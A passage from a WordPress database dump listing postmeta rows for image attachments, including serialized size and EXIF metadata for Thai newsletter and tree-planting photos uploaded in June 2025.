;s:218:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26230;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3817,1365,'_wp_attached_file','2025/06/S__67395621_0.jpg'),
(3818,1365,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2025/06/S__67395621_0.jpg\";s:8:\"filesize\";i:680670;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__67395621_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21079;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__67395621_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:183688;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395621_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10280;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__67395621_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111962;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__67395621_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:352057;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__67395621_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26702;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3819,1366,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4.jpg'),
(3820,1366,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4.jpg\";s:8:\"filesize\";i:427799;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23868;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176526;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9064;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176526;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3821,1367,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2.jpg'),
(3822,1367,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2.jpg\";s:8:\"filesize\";i:662844;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26363;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242380;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9747;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242380;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23248;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3823,1368,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3.jpg'),
(3824,1368,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3.jpg\";s:8:\"filesize\";i:494928;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23930;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195124;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8772;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195124;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20861;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3825,1369,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5.jpg'),
(3826,1369,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5.jpg\";s:8:\"filesize\";i:503158;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25461;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9114;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203448;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22145;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3827,1370,'_wp_attached_file','2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1.jpg'),
(3828,1370,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:138:\"2025/06/LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1.jpg\";s:8:\"filesize\";i:566921;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25684;}s:5:\"large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214937;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9630;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:139:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214937;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:138:\"LINE_ALBUM_ปลูกต้นไม้-ประชุมเตรียมความพร้อมเปิเ_250613_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3830,1359,'_thumbnail_id','1365'),
(3831,1359,'_edit_last','1'),
(3833,1359,'title_style','default'),
(3834,1359,'_title_style','field_5d1a0217cf408'),
(3835,1371,'title_style','default'),
(3836,1371,'_title_style','field_5d1a0217cf408'),
(3837,1359,'related',''),
(3838,1359,'_related','field_603b51c3e183e'),
(3839,1371,'related',''),
(3840,1371,'_related','field_603b51c3e183e'),
(3841,1372,'_edit_lock','1749791511:1'),
(3842,1373,'_wp_attached_file','2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1.jpg'),
(3843,1373,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:220:\"2025/06/สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1.jpg\";s:8:\"filesize\";i:606903;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:220:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27246;}s:5:\"large\";a:5:{s:4:\"file\";s:221:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203389;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:220:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:221:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223985;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:222:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380534;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:220:\"สีฟ้า-สีส้ม-ทันสมัย-ข่าวประชาสัมพันธ์-การประชุมองค์กรท้องถิ่น-จดหมายข่าว-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26230;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3845,1372,'_thumbnail_id','1373'),
(3846,1372,'_edit_last','1'),
(3847,1372,'title_style','default'),
(3848,1372,'_title_style','field_5d1a0217cf408'),
(3849,1372,'related',''),
(3850,1372,'_related','field_603b51c3e183e'),
(3851,1374,'title_style','default'),
(3852,1374,'_title_style','field_5d1a0217cf408'),
(3853,1374,'related',''),
(3854,1374,'_related','field_603b51c3e183e'),
(3855,1375,'_edit_lock','1749792287:1'),
(3856,1376,'_wp_attached_file','2025/06/6-68.png'),
(3857,1376,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/06/6-68.png\";s:8:\"filesize\";i:2857887;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"6-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95976;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"6-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:811333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"6-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40075;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"6-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:898427;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"6-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1620607;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"6-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94023;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3858,1377,'_wp_attached_file','2025/06/6-68-1.png'),
(3859,1377,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:18:\"2025/06/6-68-1.png\";s:8:\"filesize\";i:2857887;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"6-68-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95976;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"6-68-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:811333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"6-68-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40075;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"6-68-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:898427;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"6-68-1-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1620607;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"6-68-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94023;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3861,1375,'_thumbnail_id','1377'),
(3862,1375,'_edit_last','1'),
(3863,1375,'title_style','default'),
(3864,1375,'_title_style','field_5d1a0217cf408'),
(3865,1375,'related',''),
(3866,1375,'_related','field_603b51c3e183e'),
(3867,1378,'title_style','default'),
(3868,1378,'_title_style','field_5d1a0217cf408'),
(3869,1378,'related',''),
(3870,1378,'_related','field_603b51c3e183e'),
(3871,1379,'_edit_lock','1750043270:1'),
(3872,1380,'_wp_attached_file','2025/06/19484_0.jpg'),
(3873,1381,'_wp_attached_file','2025/06/19486_0.jpg'),
(3874,1382,'_wp_attached_file','2025/06/19488_0.jpg'),
(3875,1383,'_wp_attached_file','2025/06/19487_0.jpg'),
(3876,1380,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19484_0.jpg\";s:8:\"filesize\";i:227295;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19484_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17231;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19484_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126733;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19484_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8537;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19484_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78667;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19484_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:238786;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19484_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3877,1381,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:19:\"2025/06/19486_0.jpg\";s:8:\"filesize\";i:242092;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"19486_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18692;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"19486_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137776;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"19486_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9108;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"19486_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86437;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"19486_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:255557;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"19486_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23555;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
